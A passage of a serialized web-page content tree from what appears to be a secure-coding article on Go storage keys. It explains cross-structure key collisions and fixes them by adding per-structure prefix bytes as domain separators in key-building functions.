"type":33,"value":86174},"    positionNameEncoded",{"type":28,"tag":116,"props":86176,"children":86177},{"style":370},[86178],{"type":33,"value":76036},{"type":28,"tag":116,"props":86180,"children":86181},{"style":282},[86182],{"type":33,"value":85182},{"type":28,"tag":116,"props":86184,"children":86185},{"style":266},[86186],{"type":33,"value":3133},{"type":28,"tag":116,"props":86188,"children":86189},{"class":245,"line":981},[86190,86194,86198],{"type":28,"tag":116,"props":86191,"children":86192},{"style":266},[86193],{"type":33,"value":86073},{"type":28,"tag":116,"props":86195,"children":86196},{"style":339},[86197],{"type":33,"value":84383},{"type":28,"tag":116,"props":86199,"children":86200},{"style":266},[86201],{"type":33,"value":3178},{"type":28,"tag":116,"props":86203,"children":86204},{"class":245,"line":1011},[86205,86209,86213,86217,86221,86225,86229,86233],{"type":28,"tag":116,"props":86206,"children":86207},{"style":272},[86208],{"type":33,"value":86089},{"type":28,"tag":116,"props":86210,"children":86211},{"style":266},[86212],{"type":33,"value":141},{"type":28,"tag":116,"props":86214,"children":86215},{"style":282},[86216],{"type":33,"value":85219},{"type":28,"tag":116,"props":86218,"children":86219},{"style":266},[86220],{"type":33,"value":313},{"type":28,"tag":116,"props":86222,"children":86223},{"style":282},[86224],{"type":33,"value":8807},{"type":28,"tag":116,"props":86226,"children":86227},{"style":266},[86228],{"type":33,"value":313},{"type":28,"tag":116,"props":86230,"children":86231},{"style":272},[86232],{"type":33,"value":85358},{"type":28,"tag":116,"props":86234,"children":86235},{"style":266},[86236],{"type":33,"value":85240},{"type":28,"tag":116,"props":86238,"children":86239},{"class":245,"line":1029},[86240],{"type":28,"tag":116,"props":86241,"children":86242},{"style":266},[86243],{"type":33,"value":23574},{"type":28,"tag":116,"props":86245,"children":86246},{"class":245,"line":1038},[86247,86251,86255,86259,86263,86267,86271,86275],{"type":28,"tag":116,"props":86248,"children":86249},{"style":272},[86250],{"type":33,"value":85210},{"type":28,"tag":116,"props":86252,"children":86253},{"style":266},[86254],{"type":33,"value":141},{"type":28,"tag":116,"props":86256,"children":86257},{"style":282},[86258],{"type":33,"value":85264},{"type":28,"tag":116,"props":86260,"children":86261},{"style":266},[86262],{"type":33,"value":313},{"type":28,"tag":116,"props":86264,"children":86265},{"style":272},[86266],{"type":33,"value":85299},{"type":28,"tag":116,"props":86268,"children":86269},{"style":266},[86270],{"type":33,"value":825},{"type":28,"tag":116,"props":86272,"children":86273},{"style":272},[86274],{"type":33,"value":85358},{"type":28,"tag":116,"props":86276,"children":86277},{"style":266},[86278],{"type":33,"value":2830},{"type":28,"tag":116,"props":86280,"children":86281},{"class":245,"line":1047},[86282],{"type":28,"tag":116,"props":86283,"children":86284},{"emptyLinePlaceholder":19},[86285],{"type":33,"value":1044},{"type":28,"tag":116,"props":86287,"children":86288},{"class":245,"line":1071},[86289,86294,86298,86302,86306,86310],{"type":28,"tag":116,"props":86290,"children":86291},{"style":272},[86292],{"type":33,"value":86293},"    key",{"type":28,"tag":116,"props":86295,"children":86296},{"style":370},[86297],{"type":33,"value":76036},{"type":28,"tag":116,"props":86299,"children":86300},{"style":272},[86301],{"type":33,"value":81852},{"type":28,"tag":116,"props":86303,"children":86304},{"style":266},[86305],{"type":33,"value":141},{"type":28,"tag":116,"props":86307,"children":86308},{"style":282},[86309],{"type":33,"value":84841},{"type":28,"tag":116,"props":86311,"children":86312},{"style":266},[86313],{"type":33,"value":3133},{"type":28,"tag":116,"props":86315,"children":86316},{"class":245,"line":1137},[86317,86322],{"type":28,"tag":116,"props":86318,"children":86319},{"style":563},[86320],{"type":33,"value":86321},"        \"%d%s%s%s%s\"",{"type":28,"tag":116,"props":86323,"children":86324},{"style":266},[86325],{"type":33,"value":3178},{"type":28,"tag":116,"props":86327,"children":86328},{"class":245,"line":1181},[86329,86334],{"type":28,"tag":116,"props":86330,"children":86331},{"style":272},[86332],{"type":33,"value":86333},"        vaultId",{"type":28,"tag":116,"props":86335,"children":86336},{"style":266},[86337],{"type":33,"value":3178},{"type":28,"tag":116,"props":86339,"children":86340},{"class":245,"line":1212},[86341,86346],{"type":28,"tag":116,"props":86342,"children":86343},{"style":272},[86344],{"type":33,"value":86345},"        Seperator",{"type":28,"tag":116,"props":86347,"children":86348},{"style":266},[86349],{"type":33,"value":3178},{"type":28,"tag":116,"props":86351,"children":86352},{"class":245,"line":1254},[86353,86358],{"type":28,"tag":116,"props":86354,"children":86355},{"style":272},[86356],{"type":33,"value":86357},"        usernameEncoded",{"type":28,"tag":116,"props":86359,"children":86360},{"style":266},[86361],{"type":33,"value":3178},{"type":28,"tag":116,"props":86363,"children":86364},{"class":245,"line":1262},[86365,86369],{"type":28,"tag":116,"props":86366,"children":86367},{"style":272},[86368],{"type":33,"value":86345},{"type":28,"tag":116,"props":86370,"children":86371},{"style":266},[86372],{"type":33,"value":3178},{"type":28,"tag":116,"props":86374,"children":86375},{"class":245,"line":1294},[86376,86381],{"type":28,"tag":116,"props":86377,"children":86378},{"style":272},[86379],{"type":33,"value":86380},"        positionNameEncoded",{"type":28,"tag":116,"props":86382,"children":86383},{"style":266},[86384],{"type":33,"value":3178},{"type":28,"tag":116,"props":86386,"children":86387},{"class":245,"line":1334},[86388],{"type":28,"tag":116,"props":86389,"children":86390},{"style":266},[86391],{"type":33,"value":23574},{"type":28,"tag":116,"props":86393,"children":86394},{"class":245,"line":1372},[86395],{"type":28,"tag":116,"props":86396,"children":86397},{"style":266},[86398],{"type":33,"value":406},{"type":28,"tag":116,"props":86400,"children":86401},{"class":245,"line":1381},[86402],{"type":28,"tag":116,"props":86403,"children":86404},{"emptyLinePlaceholder":19},[86405],{"type":33,"value":1044},{"type":28,"tag":116,"props":86407,"children":86408},{"class":245,"line":1389},[86409],{"type":28,"tag":116,"props":86410,"children":86411},{"emptyLinePlaceholder":19},[86412],{"type":33,"value":1044},{"type":28,"tag":116,"props":86414,"children":86415},{"class":245,"line":1425},[86416,86420,86425],{"type":28,"tag":116,"props":86417,"children":86418},{"style":376},[86419],{"type":33,"value":75920},{"type":28,"tag":116,"props":86421,"children":86422},{"style":282},[86423],{"type":33,"value":86424}," AddressMapKey",{"type":28,"tag":116,"props":86426,"children":86427},{"style":266},[86428],{"type":33,"value":3133},{"type":28,"tag":116,"props":86430,"children":86431},{"class":245,"line":1448},[86432,86436,86440],{"type":28,"tag":116,"props":86433,"children":86434},{"style":272},[86435],{"type":33,"value":84865},{"type":28,"tag":116,"props":86437,"children":86438},{"style":339},[86439],{"type":33,"value":76041},{"type":28,"tag":116,"props":86441,"children":86442},{"style":266},[86443],{"type":33,"value":3178},{"type":28,"tag":116,"props":86445,"children":86446},{"class":245,"line":1456},[86447,86451,86455,86460,86464],{"type":28,"tag":116,"props":86448,"children":86449},{"style":272},[86450],{"type":33,"value":84877},{"type":28,"tag":116,"props":86452,"children":86453},{"style":266},[86454],{"type":33,"value":825},{"type":28,"tag":116,"props":86456,"children":86457},{"style":272},[86458],{"type":33,"value":86459},"addressName",{"type":28,"tag":116,"props":86461,"children":86462},{"style":266},[86463],{"type":33,"value":75847},{"type":28,"tag":116,"props":86465,"children":86466},{"style":339},[86467],{"type":33,"value":83846},{"type":28,"tag":116,"props":86469,"children":86470},{"class":245,"line":1520},[86471,86475,86479,86483,86487],{"type":28,"tag":116,"props":86472,"children":86473},{"style":266},[86474],{"type":33,"value":76002},{"type":28,"tag":116,"props":86476,"children":86477},{"style":272},[86478],{"type":33,"value":71774},{"type":28,"tag":116,"props":86480,"children":86481},{"style":266},[86482],{"type":33,"value":75847},{"type":28,"tag":116,"props":86484,"children":86485},{"style":339},[86486],{"type":33,"value":84383},{"type":28,"tag":116,"props":86488,"children":86489},{"style":266},[86490],{"type":33,"value":844},{"type":28,"tag":116,"props":86492,"children":86493},{"class":245,"line":1580},[86494,86498,86502,86506],{"type":28,"tag":116,"props":86495,"children":86496},{"style":272},[86497],{"type":33,"value":85479},{"type":28,"tag":116,"props":86499,"children":86500},{"style":370},[86501],{"type":33,"value":76036},{"type":28,"tag":116,"props":86503,"children":86504},{"style":282},[86505],{"type":33,"value":85182},{"type":28,"tag":116,"props":86507,"children":86508},{"style":266},[86509],{"type":33,"value":3133},{"type":28,"tag":116,"props":86511,"children":86512},{"class":245,"line":1620},[86513,86517,86521],{"type":28,"tag":116,"props":86514,"children":86515},{"style":266},[86516],{"type":33,"value":86073},{"type":28,"tag":116,"props":86518,"children":86519},{"style":339},[86520],{"type":33,"value":84383},{"type":28,"tag":116,"props":86522,"children":86523},{"style":266},[86524],{"type":33,"value":3178},{"type":28,"tag":116,"props":86526,"children":86527},{"class":245,"line":1668},[86528,86532,86536,86540,86544,86548,86552,86556],{"type":28,"tag":116,"props":86529,"children":86530},{"style":272},[86531],{"type":33,"value":86089},{"type":28,"tag":116,"props":86533,"children":86534},{"style":266},[86535],{"type":33,"value":141},{"type":28,"tag":116,"props":86537,"children":86538},{"style":282},[86539],{"type":33,"value":85219},{"type":28,"tag":116,"props":86541,"children":86542},{"style":266},[86543],{"type":33,"value":313},{"type":28,"tag":116,"props":86545,"children":86546},{"style":282},[86547],{"type":33,"value":8807},{"type":28,"tag":116,"props":86549,"children":86550},{"style":266},[86551],{"type":33,"value":313},{"type":28,"tag":116,"props":86553,"children":86554},{"style":272},[86555],{"type":33,"value":85089},{"type":28,"tag":116,"props":86557,"children":86558},{"style":266},[86559],{"type":33,"value":85240},{"type":28,"tag":116,"props":86561,"children":86562},{"class":245,"line":1677},[86563],{"type":28,"tag":116,"props":86564,"children":86565},{"style":266},[86566],{"type":33,"value":23574},{"type":28,"tag":116,"props":86568,"children":86569},{"class":245,"line":1685},[86570,86574,86578,86582,86586,86590,86594,86598],{"type":28,"tag":116,"props":86571,"children":86572},{"style":272},[86573],{"type":33,"value":85210},{"type":28,"tag":116,"props":86575,"children":86576},{"style":266},[86577],{"type":33,"value":141},{"type":28,"tag":116,"props":86579,"children":86580},{"style":282},[86581],{"type":33,"value":85264},{"type":28,"tag":116,"props":86583,"children":86584},{"style":266},[86585],{"type":33,"value":313},{"type":28,"tag":116,"props":86587,"children":86588},{"style":272},[86589],{"type":33,"value":85173},{"type":28,"tag":116,"props":86591,"children":86592},{"style":266},[86593],{"type":33,"value":825},{"type":28,"tag":116,"props":86595,"children":86596},{"style":272},[86597],{"type":33,"value":85089},{"type":28,"tag":116,"props":86599,"children":86600},{"style":266},[86601],{"type":33,"value":2830},{"type":28,"tag":116,"props":86603,"children":86604},{"class":245,"line":1729},[86605],{"type":28,"tag":116,"props":86606,"children":86607},{"emptyLinePlaceholder":19},[86608],{"type":33,"value":1044},{"type":28,"tag":116,"props":86610,"children":86611},{"class":245,"line":1764},[86612,86617,86621,86625],{"type":28,"tag":116,"props":86613,"children":86614},{"style":272},[86615],{"type":33,"value":86616},"    addressNameEncoded",{"type":28,"tag":116,"props":86618,"children":86619},{"style":370},[86620],{"type":33,"value":76036},{"type":28,"tag":116,"props":86622,"children":86623},{"style":282},[86624],{"type":33,"value":85182},{"type":28,"tag":116,"props":86626,"children":86627},{"style":266},[86628],{"type":33,"value":3133},{"type":28,"tag":116,"props":86630,"children":86631},{"class":245,"line":1896},[86632,86636,86640],{"type":28,"tag":116,"props":86633,"children":86634},{"style":266},[86635],{"type":33,"value":86073},{"type":28,"tag":116,"props":86637,"children":86638},{"style":339},[86639],{"type":33,"value":84383},{"type":28,"tag":116,"props":86641,"children":86642},{"style":266},[86643],{"type":33,"value":3178},{"type":28,"tag":116,"props":86645,"children":86646},{"class":245,"line":1932},[86647,86651,86655,86659,86663,86667,86671,86675],{"type":28,"tag":116,"props":86648,"children":86649},{"style":272},[86650],{"type":33,"value":86089},{"type":28,"tag":116,"props":86652,"children":86653},{"style":266},[86654],{"type":33,"value":141},{"type":28,"tag":116,"props":86656,"children":86657},{"style":282},[86658],{"type":33,"value":85219},{"type":28,"tag":116,"props":86660,"children":86661},{"style":266},[86662],{"type":33,"value":313},{"type":28,"tag":116,"props":86664,"children":86665},{"style":282},[86666],{"type":33,"value":8807},{"type":28,"tag":116,"props":86668,"children":86669},{"style":266},[86670],{"type":33,"value":313},{"type":28,"tag":116,"props":86672,"children":86673},{"style":272},[86674],{"type":33,"value":86459},{"type":28,"tag":116,"props":86676,"children":86677},{"style":266},[86678],{"type":33,"value":85240},{"type":28,"tag":116,"props":86680,"children":86681},{"class":245,"line":1940},[86682],{"type":28,"tag":116,"props":86683,"children":86684},{"style":266},[86685],{"type":33,"value":23574},{"type":28,"tag":116,"props":86687,"children":86688},{"class":245,"line":1948},[86689,86693,86697,86701,86705,86710,86714,86718],{"type":28,"tag":116,"props":86690,"children":86691},{"style":272},[86692],{"type":33,"value":85210},{"type":28,"tag":116,"props":86694,"children":86695},{"style":266},[86696],{"type":33,"value":141},{"type":28,"tag":116,"props":86698,"children":86699},{"style":282},[86700],{"type":33,"value":85264},{"type":28,"tag":116,"props":86702,"children":86703},{"style":266},[86704],{"type":33,"value":313},{"type":28,"tag":116,"props":86706,"children":86707},{"style":272},[86708],{"type":33,"value":86709},"addressNameEncoded",{"type":28,"tag":116,"props":86711,"children":86712},{"style":266},[86713],{"type":33,"value":825},{"type":28,"tag":116,"props":86715,"children":86716},{"style":272},[86717],{"type":33,"value":86459},{"type":28,"tag":116,"props":86719,"children":86720},{"style":266},[86721],{"type":33,"value":2830},{"type":28,"tag":116,"props":86723,"children":86724},{"class":245,"line":1957},[86725],{"type":28,"tag":116,"props":86726,"children":86727},{"emptyLinePlaceholder":19},[86728],{"type":33,"value":1044},{"type":28,"tag":116,"props":86730,"children":86731},{"class":245,"line":1970},[86732,86736,86740,86744,86748,86752],{"type":28,"tag":116,"props":86733,"children":86734},{"style":272},[86735],{"type":33,"value":86293},{"type":28,"tag":116,"props":86737,"children":86738},{"style":370},[86739],{"type":33,"value":76036},{"type":28,"tag":116,"props":86741,"children":86742},{"style":272},[86743],{"type":33,"value":81852},{"type":28,"tag":116,"props":86745,"children":86746},{"style":266},[86747],{"type":33,"value":141},{"type":28,"tag":116,"props":86749,"children":86750},{"style":282},[86751],{"type":33,"value":84841},{"type":28,"tag":116,"props":86753,"children":86754},{"style":266},[86755],{"type":33,"value":3133},{"type":28,"tag":116,"props":86757,"children":86758},{"class":245,"line":1987},[86759,86763],{"type":28,"tag":116,"props":86760,"children":86761},{"style":563},[86762],{"type":33,"value":86321},{"type":28,"tag":116,"props":86764,"children":86765},{"style":266},[86766],{"type":33,"value":3178},{"type":28,"tag":116,"props":86768,"children":86769},{"class":245,"line":2003},[86770,86774],{"type":28,"tag":116,"props":86771,"children":86772},{"style":272},[86773],{"type":33,"value":86333},{"type":28,"tag":116,"props":86775,"children":86776},{"style":266},[86777],{"type":33,"value":3178},{"type":28,"tag":116,"props":86779,"children":86780},{"class":245,"line":31949},[86781,86785],{"type":28,"tag":116,"props":86782,"children":86783},{"style":272},[86784],{"type":33,"value":86345},{"type":28,"tag":116,"props":86786,"children":86787},{"style":266},[86788],{"type":33,"value":3178},{"type":28,"tag":116,"props":86790,"children":86791},{"class":245,"line":80570},[86792,86796],{"type":28,"tag":116,"props":86793,"children":86794},{"style":272},[86795],{"type":33,"value":86357},{"type":28,"tag":116,"props":86797,"children":86798},{"style":266},[86799],{"type":33,"value":3178},{"type":28,"tag":116,"props":86801,"children":86802},{"class":245,"line":80583},[86803,86807],{"type":28,"tag":116,"props":86804,"children":86805},{"style":272},[86806],{"type":33,"value":86345},{"type":28,"tag":116,"props":86808,"children":86809},{"style":266},[86810],{"type":33,"value":3178},{"type":28,"tag":116,"props":86812,"children":86813},{"class":245,"line":80591},[86814,86819],{"type":28,"tag":116,"props":86815,"children":86816},{"style":272},[86817],{"type":33,"value":86818},"        addressNameEncoded",{"type":28,"tag":116,"props":86820,"children":86821},{"style":266},[86822],{"type":33,"value":3178},{"type":28,"tag":116,"props":86824,"children":86825},{"class":245,"line":80599},[86826],{"type":28,"tag":116,"props":86827,"children":86828},{"style":266},[86829],{"type":33,"value":23574},{"type":28,"tag":116,"props":86831,"children":86832},{"class":245,"line":80607},[86833],{"type":28,"tag":116,"props":86834,"children":86835},{"style":266},[86836],{"type":33,"value":406},{"type":28,"tag":29,"props":86838,"children":86839},{},[86840,86842,86847],{"type":33,"value":86841},"Unfortunately, when dealing with more than one storage entry within the same ",{"type":28,"tag":98,"props":86843,"children":86845},{"className":86844},[],[86846],{"type":33,"value":84595},{"type":33,"value":86848},", the previous implementation is not enough to guarantee key uniqueness. While it still effectively prevents key collisions within each individual structure, it does not prevent cross-structure key collisions.",{"type":28,"tag":234,"props":86850,"children":86852},{"code":86851},"vaultId = 1, username = \"a\", positionName = \"b\"\n    => PositionMapKey = \"1|a|b\"\n\nvaultId = 1, username = \"a\", addressName = \"b\"\n    => AddressMapKey = \"1|a||b\"\n",[86853],{"type":28,"tag":98,"props":86854,"children":86855},{"__ignoreMap":7},[86856],{"type":33,"value":86851},{"type":28,"tag":29,"props":86858,"children":86859},{},[86860],{"type":33,"value":86861},"To prevent this, add a structure-specific prefix to the start of each key to act as a domain separator.",{"type":28,"tag":234,"props":86863,"children":86865},{"code":86864,"language":75784,"meta":7,"className":75785,"style":7},"const (\n    Seperator = \"|\"\n    PositionMapPrefix = \"\\x01\"\n    AddressMapPrefix = \"\\x02\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        PositionMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        AddressMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    )\n}\n",[86866],{"type":28,"tag":98,"props":86867,"children":86868},{"__ignoreMap":7},[86869,86880,86895,86922,86947,86954,86961,86968,86983,86998,87025,87048,87067,87082,87117,87124,87159,87166,87185,87200,87235,87242,87277,87284,87311,87323,87335,87346,87357,87368,87379,87390,87397,87404,87411,87418,87433,87448,87475,87498,87517,87532,87567,87574,87609,87616,87635,87650,87685,87692,87727,87734,87761,87772,87784,87795,87806,87817,87828,87839,87847],{"type":28,"tag":116,"props":86870,"children":86871},{"class":245,"line":246},[86872,86876],{"type":28,"tag":116,"props":86873,"children":86874},{"style":376},[86875],{"type":33,"value":9323},{"type":28,"tag":116,"props":86877,"children":86878},{"style":266},[86879],{"type":33,"value":78186},{"type":28,"tag":116,"props":86881,"children":86882},{"class":245,"line":256},[86883,86887,86891],{"type":28,"tag":116,"props":86884,"children":86885},{"style":272},[86886],{"type":33,"value":84949},{"type":28,"tag":116,"props":86888,"children":86889},{"style":370},[86890],{"type":33,"value":2226},{"type":28,"tag":116,"props":86892,"children":86893},{"style":563},[86894],{"type":33,"value":84958},{"type":28,"tag":116,"props":86896,"children":86897},{"class":245,"line":293},[86898,86903,86907,86912,86917],{"type":28,"tag":116,"props":86899,"children":86900},{"style":272},[86901],{"type":33,"value":86902},"    PositionMapPrefix",{"type":28,"tag":116,"props":86904,"children":86905},{"style":370},[86906],{"type":33,"value":2226},{"type":28,"tag":116,"props":86908,"children":86909},{"style":563},[86910],{"type":33,"value":86911}," \"",{"type":28,"tag":116,"props":86913,"children":86914},{"style":1836},[86915],{"type":33,"value":86916},"\\x01",{"type":28,"tag":116,"props":86918,"children":86919},{"style":563},[86920],{"type":33,"value":86921},"\"\n",{"type":28,"tag":116,"props":86923,"children":86924},{"class":245,"line":361},[86925,86930,86934,86938,86943],{"type":28,"tag":116,"props":86926,"children":86927},{"style":272},[86928],{"type":33,"value":86929},"    AddressMapPrefix",{"type":28,"tag":116,"props":86931,"children":86932},{"style":370},[86933],{"type":33,"value":2226},{"type":28,"tag":116,"props":86935,"children":86936},{"style":563},[86937],{"type":33,"value":86911},{"type":28,"tag":116,"props":86939,"children":86940},{"style":1836},[86941],{"type":33,"value":86942},"\\x02",{"type":28,"tag":116,"props":86944,"children":86945},{"style":563},[86946],{"type":33,"value":86921},{"type":28,"tag":116,"props":86948,"children":86949},{"class":245,"line":387},[86950],{"type":28,"tag":116,"props":86951,"children":86952},{"style":266},[86953],{"type":33,"value":2830},{"type":28,"tag":116,"props":86955,"children":86956},{"class":245,"line":400},[86957],{"type":28,"tag":116,"props":86958,"children":86959},{"emptyLinePlaceholder":19},[86960],{"type":33,"value":1044},{"type":28,"tag":116,"props":86962,"children":86963},{"class":245,"line":614},[86964],{"type":28,"tag":116,"props":86965,"children":86966},{"emptyLinePlaceholder":19},[86967],{"type":33,"value":1044},{"type":28,"tag":116,"props":86969,"children":86970},{"class":245,"line":631},[86971,86975,86979],{"type":28,"tag":116,"props":86972,"children":86973},{"style":376},[86974],{"type":33,"value":75920},{"type":28,"tag":116,"props":86976,"children":86977},{"style":282},[86978],{"type":33,"value":85977},{"type":28,"tag":116,"props":86980,"children":86981},{"style":266},[86982],{"type":33,"value":3133},{"type":28,"tag":116,"props":86984,"children":86985},{"class":245,"line":665},[86986,86990,86994],{"type":28,"tag":116,"props":86987,"children":86988},{"style":272},[86989],{"type":33,"value":84865},{"type":28,"tag":116,"props":86991,"children":86992},{"style":339},[86993],{"type":33,"value":76041},{"type":28,"tag":116,"props":86995,"children":86996},{"style":266},[86997],{"type":33,"value":3178},{"type":28,"tag":116,"props":86999,"children":87000},{"class":245,"line":713},[87001,87005,87009,87013,87017,87021],{"type":28,"tag":116,"props":87002,"children":87003},{"style":272},[87004],{"type":33,"value":84877},{"type":28,"tag":116,"props":87006,"children":87007},{"style":266},[87008],{"type":33,"value":825},{"type":28,"tag":116,"props":87010,"children":87011},{"style":272},[87012],{"type":33,"value":85358},{"type":28,"tag":116,"props":87014,"children":87015},{"style":266},[87016],{"type":33,"value":75847},{"type":28,"tag":116,"props":87018,"children":87019},{"style":339},[87020],{"type":33,"value":84383},{"type":28,"tag":116,"props":87022,"children":87023},{"style":266},[87024],{"type":33,"value":3178},{"type":28,"tag":116,"props":87026,"children":87027},{"class":245,"line":750},[87028,87032,87036,87040,87044],{"type":28,"tag":116,"props":87029,"children":87030},{"style":266},[87031],{"type":33,"value":76002},{"type":28,"tag":116,"props":87033,"children":87034},{"style":272},[87035],{"type":33,"value":71774},{"type":28,"tag":116,"props":87037,"children":87038},{"style":266},[87039],{"type":33,"value":75847},{"type":28,"tag":116,"props":87041,"children":87042},{"style":339},[87043],{"type":33,"value":84383},{"type":28,"tag":116,"props":87045,"children":87046},{"style":266},[87047],{"type":33,"value":844},{"type":28,"tag":116,"props":87049,"children":87050},{"class":245,"line":779},[87051,87055,87059,87063],{"type":28,"tag":116,"props":87052,"children":87053},{"style":272},[87054],{"type":33,"value":85479},{"type":28,"tag":116,"props":87056,"children":87057},{"style":370},[87058],{"type":33,"value":76036},{"type":28,"tag":116,"props":87060,"children":87061},{"style":282},[87062],{"type":33,"value":85182},{"type":28,"tag":116,"props":87064,"children":87065},{"style":266},[87066],{"type":33,"value":3133},{"type":28,"tag":116,"props":87068,"children":87069},{"class":245,"line":796},[87070,87074,87078],{"type":28,"tag":116,"props":87071,"children":87072},{"style":266},[87073],{"type":33,"value":86073},{"type":28,"tag":116,"props":87075,"children":87076},{"style":339},[87077],{"type":33,"value":84383},{"type":28,"tag":116,"props":87079,"children":87080},{"style":266},[87081],{"type":33,"value":3178},{"type":28,"tag":116,"props":87083,"children":87084},{"class":245,"line":847},[87085,87089,87093,87097,87101,87105,87109,87113],{"type":28,"tag":116,"props":87086,"children":87087},{"style":272},[87088],{"type":33,"value":86089},{"type":28,"tag":116,"props":87090,"children":87091},{"style":266},[87092],{"type":33,"value":141},{"type":28,"tag":116,"props":87094,"children":87095},{"style":282},[87096],{"type":33,"value":85219},{"type":28,"tag":116,"props":87098,"children":87099},{"style":266},[87100],{"type":33,"value":313},{"type":28,"tag":116,"props":87102,"children":87103},{"style":282},[87104],{"type":33,"value":8807},{"type":28,"tag":116,"props":87106,"children":87107},{"style":266},[87108],{"type":33,"value":313},{"type":28,"tag":116,"props":87110,"children":87111},{"style":272},[87112],{"type":33,"value":85089},{"type":28,"tag":116,"props":87114,"children":87115},{"style":266},[87116],{"type":33,"value":85240},{"type":28,"tag":116,"props":87118,"children":87119},{"class":245,"line":898},[87120],{"type":28,"tag":116,"props":87121,"children":87122},{"style":266},[87123],{"type":33,"value":23574},{"type":28,"tag":116,"props":87125,"children":87126},{"class":245,"line":907},[87127,87131,87135,87139,87143,87147,87151,87155],{"type":28,"tag":116,"props":87128,"children":87129},{"style":272},[87130],{"type":33,"value":85210},{"type":28,"tag":116,"props":87132,"children":87133},{"style":266},[87134],{"type":33,"value":141},{"type":28,"tag":116,"props":87136,"children":87137},{"style":282},[87138],{"type":33,"value":85264},{"type":28,"tag":116,"props":87140,"children":87141},{"style":266},[87142],{"type":33,"value":313},{"type":28,"tag":116,"props":87144,"children":87145},{"style":272},[87146],{"type":33,"value":85173},{"type":28,"tag":116,"props":87148,"children":87149},{"style":266},[87150],{"type":33,"value":825},{"type":28,"tag":116,"props":87152,"children":87153},{"style":272},[87154],{"type":33,"value":85089},{"type":28,"tag":116,"props":87156,"children":87157},{"style":266},[87158],{"type":33,"value":2830},{"type":28,"tag":116,"props":87160,"children":87161},{"class":245,"line":981},[87162],{"type":28,"tag":116,"props":87163,"children":87164},{"emptyLinePlaceholder":19},[87165],{"type":33,"value":1044},{"type":28,"tag":116,"props":87167,"children":87168},{"class":245,"line":1011},[87169,87173,87177,87181],{"type":28,"tag":116,"props":87170,"children":87171},{"style":272},[87172],{"type":33,"value":86174},{"type":28,"tag":116,"props":87174,"children":87175},{"style":370},[87176],{"type":33,"value":76036},{"type":28,"tag":116,"props":87178,"children":87179},{"style":282},[87180],{"type":33,"value":85182},{"type":28,"tag":116,"props":87182,"children":87183},{"style":266},[87184],{"type":33,"value":3133},{"type":28,"tag":116,"props":87186,"children":87187},{"class":245,"line":1029},[87188,87192,87196],{"type":28,"tag":116,"props":87189,"children":87190},{"style":266},[87191],{"type":33,"value":86073},{"type":28,"tag":116,"props":87193,"children":87194},{"style":339},[87195],{"type":33,"value":84383},{"type":28,"tag":116,"props":87197,"children":87198},{"style":266},[87199],{"type":33,"value":3178},{"type":28,"tag":116,"props":87201,"children":87202},{"class":245,"line":1038},[87203,87207,87211,87215,87219,87223,87227,87231],{"type":28,"tag":116,"props":87204,"children":87205},{"style":272},[87206],{"type":33,"value":86089},{"type":28,"tag":116,"props":87208,"children":87209},{"style":266},[87210],{"type":33,"value":141},{"type":28,"tag":116,"props":87212,"children":87213},{"style":282},[87214],{"type":33,"value":85219},{"type":28,"tag":116,"props":87216,"children":87217},{"style":266},[87218],{"type":33,"value":313},{"type":28,"tag":116,"props":87220,"children":87221},{"style":282},[87222],{"type":33,"value":8807},{"type":28,"tag":116,"props":87224,"children":87225},{"style":266},[87226],{"type":33,"value":313},{"type":28,"tag":116,"props":87228,"children":87229},{"style":272},[87230],{"type":33,"value":85358},{"type":28,"tag":116,"props":87232,"children":87233},{"style":266},[87234],{"type":33,"value":85240},{"type":28,"tag":116,"props":87236,"children":87237},{"class":245,"line":1047},[87238],{"type":28,"tag":116,"props":87239,"children":87240},{"style":266},[87241],{"type":33,"value":23574},{"type":28,"tag":116,"props":87243,"children":87244},{"class":245,"line":1071},[87245,87249,87253,87257,87261,87265,87269,87273],{"type":28,"tag":116,"props":87246,"children":87247},{"style":272},[87248],{"type":33,"value":85210},{"type":28,"tag":116,"props":87250,"children":87251},{"style":266},[87252],{"type":33,"value":141},{"type":28,"tag":116,"props":87254,"children":87255},{"style":282},[87256],{"type":33,"value":85264},{"type":28,"tag":116,"props":87258,"children":87259},{"style":266},[87260],{"type":33,"value":313},{"type":28,"tag":116,"props":87262,"children":87263},{"style":272},[87264],{"type":33,"value":85299},{"type":28,"tag":116,"props":87266,"children":87267},{"style":266},[87268],{"type":33,"value":825},{"type":28,"tag":116,"props":87270,"children":87271},{"style":272},[87272],{"type":33,"value":85358},{"type":28,"tag":116,"props":87274,"children":87275},{"style":266},[87276],{"type":33,"value":2830},{"type":28,"tag":116,"props":87278,"children":87279},{"class":245,"line":1137},[87280],{"type":28,"tag":116,"props":87281,"children":87282},{"emptyLinePlaceholder":19},[87283],{"type":33,"value":1044},{"type":28,"tag":116,"props":87285,"children":87286},{"class":245,"line":1181},[87287,87291,87295,87299,87303,87307],{"type":28,"tag":116,"props":87288,"children":87289},{"style":272},[87290],{"type":33,"value":86293},{"type":28,"tag":116,"props":87292,"children":87293},{"style":370},[87294],{"type":33,"value":76036},{"type":28,"tag":116,"props":87296,"children":87297},{"style":272},[87298],{"type":33,"value":81852},{"type":28,"tag":116,"props":87300,"children":87301},{"style":266},[87302],{"type":33,"value":141},{"type":28,"tag":116,"props":87304,"children":87305},{"style":282},[87306],{"type":33,"value":84841},{"type":28,"tag":116,"props":87308,"children":87309},{"style":266},[87310],{"type":33,"value":3133},{"type":28,"tag":116,"props":87312,"children":87313},{"class":245,"line":1212},[87314,87319],{"type":28,"tag":116,"props":87315,"children":87316},{"style":563},[87317],{"type":33,"value":87318},"        